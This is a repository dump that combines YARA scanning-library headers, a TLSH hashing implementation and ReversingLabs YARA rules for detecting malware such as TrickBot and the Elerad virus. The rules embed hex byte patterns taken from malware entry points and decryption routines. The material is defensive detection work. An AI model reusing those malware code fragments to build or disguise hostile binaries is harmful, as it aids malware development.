├── src ├── lib │ ├── stino.settings │ ├── modules │ │ ├── pb_tests │ │ │ ├── yara.pb-c.h │ │ │ └── pb_tests.proto │ │ ├── module_list │ │ ├── pb_to_module.rst │ │ ├── pe │ │ │ └── authenticode-parser │ │ │ │ ├── certificate.h │ │ │ │ ├── countersignature.h │ │ │ │ ├── helper.h │ │ │ │ ├── helper.c │ │ │ │ ├── structs.c │ │ │ │ └── structs.h │ │ ├── demo │ │ │ └── demo.c │ │ └── time │ │ │ └── time.c │ ├── include │ │ ├── yara │ │ │ ├── notebook.h │ │ │ ├── simple_str.h │ │ │ ├── elf_utils.h │ │ │ ├── exefiles.h │ │ │ ├── base64.h │ │ │ ├── scan.h │ │ │ ├── mem.h │ │ │ ├── stream.h │ │ │ ├── proc.h │ │ │ ├── stack.h │ │ │ ├── pe_utils.h │ │ │ ├── threading.h │ │ │ ├── stopwatch.h │ │ │ ├── filemap.h │ │ │ ├── ahocorasick.h │ │ │ ├── sizedstr.h │ │ │ ├── endian.h │ │ │ ├── unaligned.h │ │ │ ├── strutils.h │ │ │ ├── dex.h │ │ │ ├── integers.h │ │ │ ├── scanner.h │ │ │ └── bitmask.h │ │ ├── yara.h │ │ └── tlshc │ │ │ └── tlsh.h │ ├── tlshc │ │ ├── tlsh_util.h │ │ ├── tlsh.c │ │ └── tlsh_impl.h │ ├── pb │ │ └── yara.proto │ ├── stream.c │ ├── endian.c │ ├── proc │ │ └── none.c │ ├── hex_grammar.h │ └── simple_str.c └── exp │ ├── virus │ ├── Win32.Virus.Awfull.yara │ ├── Linux.Virus.Vit.yara │ ├── Win32.Virus.Elerad.yara │ └── Win32.Virus.Greenp.yara │ ├── trojan │ ├── Win32.Trojan.TrickBot.yara │ ├── Win32.Trojan.HermeticWiper.yara │ ├── Linux.Trojan.AcidRain.yara │ └── Win32.Trojan.Dridex.yara │ ├── ransomware │ ├── Win32.Ransomware.Archiveus.yara │ ├── Win32.Ransomware.Petya.yara │ ├── Win32.Ransomware.Flamingo.yara │ ├── Win32.Ransomware.Gpcode.yara │ ├── ByteCode.MSIL.Ransomware.Ghostbin.yara │ ├── Win32.Ransomware.Crypmic.yara │ ├── ByteCode.MSIL.Ransomware.TimeCrypt.yara │ ├── ByteCode.MSIL.Ransomware.GhosTEncryptor.yara │ ├── Bytecode.MSIL.Ransomware.CobraLocker.yara │ ├── ByteCode.MSIL.Ransomware.Povlsomware.yara │ ├── Win32.Ransomware.ChiChi.yara │ ├── ByteCode.MSIL.Ransomware.Invert.yara │ ├── Win32.Ransomware.Acepy.yara │ ├── 
ByteCode.MSIL.Ransomware.Hog.yara │ ├── ByteCode.MSIL.Ransomware.WormLocker.yara │ ├── ByteCode.MSIL.Ransomware.McBurglar.yara │ ├── Win32.Ransomware.NB65.yara │ ├── ByteCode.MSIL.Ransomware.Venom.yara │ ├── Win32.Ransomware.MRAC.yara │ ├── ByteCode.MSIL.Ransomware.Oct.yara │ ├── ByteCode.MSIL.Ransomware.Khonsari.yara │ ├── ByteCode.MSIL.Ransomware.Cring.yara │ ├── ByteCode.MSIL.Ransomware.Eternity.yara │ └── ByteCode.MSIL.Ransomware.TimeTime.yara │ └── infostealer │ └── Win32.Infostealer.StealC.yara ├── license └── LICENSE ├── README.md └── tests ├── maldev.py └── malware.py /src/lib/stino.settings: -------------------------------------------------------------------------------- 1 | { 2 | "baudrate": 4, 3 | "line_ending": 1, 4 | "serial_port": 1 5 | } -------------------------------------------------------------------------------- /src/lib/modules/pb_tests/yara.pb-c.h: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | * Empty header file generated by protoc-gen-yara because it is included from 4 | * .pb-c.h files generated by protoc-gen-c. 5 | */ 6 | -------------------------------------------------------------------------------- /src/lib/include/yara/notebook.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by Victor Manuel Alvarez on 3/4/20. 
3 | // 4 | 5 | #ifndef YR_NOTEBOOK_H 6 | #define YR_NOTEBOOK_H 7 | 8 | #include 9 | 10 | typedef struct YR_NOTEBOOK YR_NOTEBOOK; 11 | 12 | int yr_notebook_create(size_t page_size, YR_NOTEBOOK** pool); 13 | 14 | int yr_notebook_destroy(YR_NOTEBOOK* pool); 15 | 16 | void* yr_notebook_alloc(YR_NOTEBOOK* notebook, size_t size); 17 | 18 | #endif // YR_NOTEBOOK_H 19 | -------------------------------------------------------------------------------- /src/lib/modules/module_list: -------------------------------------------------------------------------------- 1 | MODULE(tests) 2 | MODULE(pe) 3 | MODULE(elf) 4 | MODULE(math) 5 | MODULE(time) 6 | MODULE(console) 7 | MODULE(string) 8 | 9 | #ifdef DOTNET_MODULE 10 | MODULE(dotnet) 11 | #endif 12 | 13 | #ifdef CUCKOO_MODULE 14 | MODULE(cuckoo) 15 | #endif 16 | 17 | #ifdef MAGIC_MODULE 18 | MODULE(magic) 19 | #endif 20 | 21 | #ifdef HASH_MODULE 22 | MODULE(hash) 23 | #endif 24 | 25 | #ifdef MACHO_MODULE 26 | MODULE(macho) 27 | #endif 28 | 29 | #ifdef DEX_MODULE 30 | MODULE(dex) 31 | #endif 32 | 33 | #ifdef PB_TESTS_MODULE 34 | MODULE(pb_tests) 35 | #endif 36 | -------------------------------------------------------------------------------- /src/lib/include/yara/simple_str.h: -------------------------------------------------------------------------------- 1 | #ifndef _SIMPLESTR_H 2 | #define _SIMPLESTR_H 3 | 4 | #include 5 | 6 | /* Simple dynamic string implementation for more readable/maintainable code 7 | Can be further optimized */ 8 | typedef struct _SIMPLE_STR 9 | { 10 | uint32_t len; 11 | uint32_t cap; 12 | char* str; 13 | } SIMPLE_STR, *PSIMPLE_STR; 14 | 15 | SIMPLE_STR* sstr_new(const char* s); 16 | SIMPLE_STR* sstr_newf(const char* fmt, ...); 17 | void sstr_free(SIMPLE_STR* ss); 18 | bool sstr_appendf(SIMPLE_STR* ss, const char* fmt, ...); 19 | char* sstr_move(SIMPLE_STR* ss); 20 | 21 | #endif -------------------------------------------------------------------------------- /src/lib/include/yara/elf_utils.h: 
-------------------------------------------------------------------------------- 1 | #ifndef YR_ELF_UTILS_H 2 | #define YR_ELF_UTILS_H 3 | 4 | #include 5 | 6 | typedef struct _ELF_SYMBOL 7 | { 8 | char *name; 9 | int value; 10 | int size; 11 | int type; 12 | int bind; 13 | int shndx; 14 | int visibility; 15 | 16 | struct _ELF_SYMBOL *next; // Next symbol in the list 17 | } ELF_SYMBOL; 18 | 19 | // Linked list of symbols 20 | typedef struct _ELF_SYMBOL_LIST 21 | { 22 | int count; 23 | ELF_SYMBOL *symbols; 24 | } ELF_SYMBOL_LIST; 25 | 26 | typedef struct _ELF 27 | { 28 | ELF_SYMBOL_LIST *symtab; 29 | ELF_SYMBOL_LIST *dynsym; 30 | char *telfhash; 31 | char *import_hash; 32 | } ELF; 33 | 34 | #endif //YR_ELF_UTILS_H 35 | -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh_util.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_UTIL_H__ 2 | #define __TLSH_TLSH_UTIL_H__ 3 | 4 | #ifdef __cplusplus 5 | extern "C" 6 | { 7 | #endif 8 | 9 | // unsigned char b_mapping(unsigned char salt, unsigned char i, unsigned char 10 | // j, unsigned char k); 11 | unsigned char l_capturing(unsigned int len); 12 | int mod_diff(unsigned int x, unsigned int y, unsigned int R); 13 | int h_distance(int len, const unsigned char x[], const unsigned char y[]); 14 | void to_hex(unsigned char* psrc, int len, char* pdest); 15 | void from_hex(const char* psrc, int len, unsigned char* pdest); 16 | unsigned char swap_byte(const unsigned char in); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | 22 | #endif // __TLSH_TLSH_UTIL_H__ -------------------------------------------------------------------------------- /src/lib/pb/yara.proto: -------------------------------------------------------------------------------- 1 | syntax = "proto3"; 2 | 3 | package yara; 4 | 5 | import "google/protobuf/descriptor.proto"; 6 | 7 | message ModuleOptions { 8 | string name = 1; 9 | string root_message = 2; 10 | } 
11 | 12 | message FieldOptions { 13 | string name = 1; 14 | bool ignore = 2; 15 | } 16 | 17 | message MessageOptions { 18 | string name = 1; 19 | } 20 | 21 | message EnumOptions { 22 | string name = 1; 23 | } 24 | 25 | extend google.protobuf.FileOptions { 26 | ModuleOptions module_options = 51503; 27 | } 28 | 29 | extend google.protobuf.FieldOptions { 30 | FieldOptions field_options = 51504; 31 | } 32 | 33 | extend google.protobuf.MessageOptions { 34 | MessageOptions message_options = 51505; 35 | } 36 | 37 | extend google.protobuf.EnumOptions { 38 | EnumOptions enum_options = 51506; 39 | } 40 | -------------------------------------------------------------------------------- /src/lib/modules/pb_to_module.rst: -------------------------------------------------------------------------------- 1 | Generating a module from a Protocol Buffer 2 | 3 | 4 | [Protocol Buffers](https://developers.google.com/protocol-buffers) (protobufs) 5 | are Google's language-neutral, platform-independent mechanism for serializing 6 | structured data. The first thing you need to do to use protobuf is define 7 | your data structures, for example: 8 | 9 | message Employee { 10 | int32 id = 1; 11 | string name = 2; 12 | int32 age = 3; 13 | string email = 4; 14 | } 15 | 16 | Once you have defined your data structure, you use a protobuf compiler to 17 | automatically generate the code that will marshal/unmarshal the data structure 18 | into/from a byte sequence. The protobuf compiler is able to generate code in 19 | multiple languages, including C/C++, Python, Java and Go. 20 | 21 | Now imagine that you can pass the marshalled data structure to YARA, and create 22 | rules based on that data. For example: 23 | 24 | import "vt_employee" 25 | 26 | rule virustotal_employee_under_25 27 | { 28 | condition: 29 | vt_employee.age < 25 and 30 | vt_employee.email matches /.*@virustotal\.com/ 31 | } 32 | 33 | Neat, right? 
34 | -------------------------------------------------------------------------------- /license/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2020 - 2024 ReversingLabs - all contributors 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal in 5 | the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | -------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Awfull.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Virus_Awfull : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "AWFULL" 14 | description = "Yara rule that detects Awfull virus." 
15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Awfull" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | $awfull_body = { 22 | 60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256] 23 | 33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02 24 | 5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA 25 | EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ?? 26 | [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ?? 27 | 56 5F AC F6 D0 AA 49 E3 02 EB F7 28 | } 29 | 30 | condition: 31 | uint16(0) == 0x5A4D and 32 | ($awfull_body at pe.entry_point) 33 | } -------------------------------------------------------------------------------- /src/exp/virus/Linux.Virus.Vit.yara: -------------------------------------------------------------------------------- 1 | import "elf" 2 | 3 | rule Linux_Virus_Vit : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "VIT" 14 | description = "Yara rule that detects Vit virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Vit" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | 22 | $vit_entry_point = { 23 | 55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4 24 | CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7 25 | 85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8 26 | 18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 
56 E8 2E FA 27 | FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56 28 | E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9 29 | FF FF BE FF FF FF FF 6A 00 6A 00 E9 30 | } 31 | 32 | $vit_str = "vi324.tmp" 33 | 34 | condition: 35 | uint32(0) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str 36 | } -------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Elerad.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Virus_Elerad : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "ELERAD" 14 | description = "Yara rule that detects Elerad virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Elerad" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | $elerad_body = { 22 | EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74 23 | 08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE 24 | 00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB 25 | 20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81 26 | ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? 
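B9 09 02 00 00 8D 85 D0 10 40 27 | 00 31 10 83 C0 04 E2 F9 28 | } 29 | 30 | condition: 31 | uint16(0) == 0x5A4D and 32 | ($elerad_body at pe.entry_point) 33 | } -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh.c: --------------------------------------------------------------------------------
#include 
#include 
#include "tlsh_impl.h"

// Allocates a new TLSH handle together with its private implementation
// state. Returns NULL if either allocation fails; nothing is leaked in that
// case. The returned handle is owned by the caller and released with
// tlsh_free().
Tlsh* tlsh_new(void)
{
  Tlsh* tlsh = malloc(sizeof *tlsh);
  if (tlsh == NULL)
    return NULL;

  tlsh->impl = tlsh_impl_new();
  if (tlsh->impl == NULL)
  {
    // Undo the partial construction so the caller has nothing to release.
    free(tlsh);
    return NULL;
  }

  return tlsh;
}

// Releases a handle created by tlsh_new(). A NULL handle is a no-op.
void tlsh_free(Tlsh* tlsh)
{
  if (tlsh == NULL)
    return;

  tlsh_impl_free(tlsh->impl);
  free(tlsh);
}

// Feeds `len` bytes from `data` into the running hash with the default
// (zero) option set.
// Returns 0 on success and 1 if the implementation rejects the update.
// A NULL handle is reported as an error, consistent with tlsh_final().
// A NULL or empty buffer is skipped, using the same guard tlsh_final()
// applies, so the implementation never sees a NULL data pointer.
int tlsh_update(Tlsh* tlsh, const unsigned char* data, unsigned int len)
{
  const int tlsh_option = 0;

  if (tlsh == NULL)
    return 1;

  if (tlsh->impl != NULL && data != NULL && len > 0)
  {
    if (tlsh_impl_update(tlsh->impl, data, len, tlsh_option) != 0)
      return 1;
  }

  return 0;
}

// Clears the running hash state so the handle can be reused.
// A NULL handle or a handle without implementation state is a no-op.
void tlsh_reset(Tlsh* tlsh)
{
  if (tlsh != NULL && tlsh->impl != NULL)
    tlsh_impl_reset(tlsh->impl);
}

// Optionally feeds a last chunk of data, then finalises the hash with
// `tlsh_option` (a combination of the TLSH_OPTION_* flags from tlsh.h).
// Returns 0 on success and 1 if the trailing update is rejected; a NULL
// handle is reported as an error. A handle without implementation state
// returns 0 without doing anything, as before.
int tlsh_final(
    Tlsh* tlsh,
    const unsigned char* data,
    unsigned int len,
    int tlsh_option)
{
  if (tlsh == NULL)
    return 1;

  if (tlsh->impl == NULL)
    return 0;

  if (data != NULL && len > 0)
  {
    if (tlsh_impl_update(tlsh->impl, data, len, tlsh_option) != 0)
      return 1;
  }

  tlsh_impl_final(tlsh->impl, tlsh_option);
  return 0;
}

// Returns the hash produced by tlsh_impl_hash(), or "" when there is no
// handle or no implementation state. `showvers` presumably selects the
// "T1" version prefix described in tlsh.h — confirm in tlsh_impl.
// NOTE(review): the ownership and lifetime of the returned string are not
// visible here; callers should not free it and should not assume it
// survives tlsh_free() or tlsh_reset() — verify against tlsh_impl.
const char* tlsh_get_hash(Tlsh* tlsh, bool showvers)
{
  if (tlsh == NULL || tlsh->impl == NULL)
    return "";

  return tlsh_impl_hash(tlsh->impl, showvers);
}
-------------------------------------------------------------------------------- /src/lib/include/yara/exefiles.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007. The YARA Authors. 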
All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */ 29 | 30 | #ifndef YR_EXEFILES_H 31 | #define YR_EXEFILES_H 32 | 33 | uint64_t yr_get_entry_point_offset(const uint8_t* buffer, size_t buffer_length); 34 | 35 | uint64_t yr_get_entry_point_address( 36 | const uint8_t* buffer, 37 | size_t buffer_length, 38 | uint64_t base_address); 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.TrickBot.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_TrickBot : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "TRICKBOT" 12 | description = "Yara rule that detects TrickBot trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "TrickBot" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $entry_setup = { 21 | 58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5] 22 | 89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1) 23 | [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ?? 24 | ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2 25 | } 26 | 27 | $decrypt_function_snippet = { 28 | 58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3 29 | } 30 | 31 | $decrypt_function_snippet_wrapper = { 32 | 55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8 33 | 89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A 34 | ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ?? 35 | 49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? 
FF 36 | D0 37 | } 38 | 39 | condition: 40 | uint16(0) == 0x5A4D and 41 | $entry_setup and 42 | ( 43 | $decrypt_function_snippet or 44 | $decrypt_function_snippet_wrapper 45 | ) 46 | } -------------------------------------------------------------------------------- /src/lib/modules/pb_tests/pb_tests.proto: -------------------------------------------------------------------------------- 1 | 2 | syntax = "proto2"; 3 | 4 | package test; 5 | import "yara.proto"; 6 | 7 | option (yara.module_options) = { 8 | name : "pb_tests" 9 | root_message: "RootMessage"; 10 | }; 11 | 12 | 13 | message Struct { 14 | option (yara.message_options).name = "struct"; 15 | required string f_string = 1; 16 | enum Enum { 17 | option (yara.enum_options).name = "enum"; 18 | FIRST = 0; 19 | SECOND = 1; 20 | } 21 | optional Enum f_enum = 2; 22 | message NestedStruct { 23 | optional int32 f_int32 = 1; 24 | optional string f_string = 2; 25 | } 26 | optional NestedStruct f_nested_struct = 3; 27 | repeated NestedStruct f_nested_struct_array = 4; 28 | } 29 | 30 | message MapStruct { 31 | optional int32 f_int32 = 1; 32 | optional int64 f_int64 = 2; 33 | } 34 | 35 | message RootMessage { 36 | optional int32 f_int32 = 1; 37 | optional int64 f_int64 = 2; 38 | //optional uint32 f_uint32 = 3; // not supported 39 | //optional uint64 f_uint64 = 4; // not supported 40 | optional sint32 f_sint32 = 5; 41 | optional sint64 f_sint64 = 6; 42 | //optional fixed32 f_fixed32 = 7; // not supported 43 | //optional fixed64 f_fixed64 = 8; // not supported 44 | optional sfixed32 f_sfixed32 = 9; 45 | optional sfixed64 f_sfixed64 = 10; 46 | optional bool f_bool = 11; 47 | optional string f_string = 12; 48 | optional bytes f_bytes = 13; 49 | repeated Struct f_struct_array = 14; 50 | map f_map_int32 = 15; 51 | map f_map_bool = 16; 52 | map f_map_string = 17; 53 | map f_map_float = 18; 54 | map f_map_struct = 19; 55 | oneof f_oneof { 56 | string f_oneof_string = 20; 57 | MapStruct f_oneof_struct = 21; 58 | } 59 | optional string 
f_ignored = 22 [(yara.field_options).ignore = true]; 60 | optional string f_renamed = 23 [(yara.field_options).name = "f_yara_name"]; 61 | } 62 | -------------------------------------------------------------------------------- /src/lib/include/yara.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2013. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */ 29 | 30 | #ifndef YR_YARA_H 31 | #define YR_YARA_H 32 | 33 | #include "yara/compiler.h" 34 | #include "yara/error.h" 35 | #include "yara/filemap.h" 36 | #include "yara/hash.h" 37 | #include "yara/libyara.h" 38 | #include "yara/mem.h" 39 | #include "yara/modules.h" 40 | #include "yara/object.h" 41 | #include "yara/scanner.h" 42 | #include "yara/stream.h" 43 | #include "yara/strutils.h" 44 | #include "yara/utils.h" 45 | 46 | #endif 47 | -------------------------------------------------------------------------------- /src/lib/include/yara/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2020. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_BASE64_H 31 | #define YR_BASE64_H 32 | 33 | #include 34 | #include 35 | #include 36 | 37 | typedef struct BASE64_NODE BASE64_NODE; 38 | 39 | struct BASE64_NODE 40 | { 41 | SIZED_STRING* str; 42 | int escaped; 43 | BASE64_NODE* next; 44 | }; 45 | 46 | int yr_base64_ast_from_string( 47 | SIZED_STRING* in_str, 48 | YR_MODIFIER modifier, 49 | RE_AST** re_ast, 50 | RE_ERROR* error); 51 | #endif 52 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/certificate.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 
